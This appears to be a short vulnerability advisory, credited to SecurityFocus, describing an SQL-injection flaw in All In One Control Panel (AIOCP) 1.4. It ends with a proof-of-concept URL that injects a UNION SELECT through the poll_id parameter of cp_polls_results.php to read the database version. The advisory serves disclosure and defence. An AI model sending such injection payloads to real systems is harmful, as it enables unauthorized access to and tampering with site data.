9 lines
No EOL
572 B
Text
9 lines
No EOL
572 B
Text
source: https://www.securityfocus.com/bid/31949/info
|
|
|
|
All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
AIOCP 1.4 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- |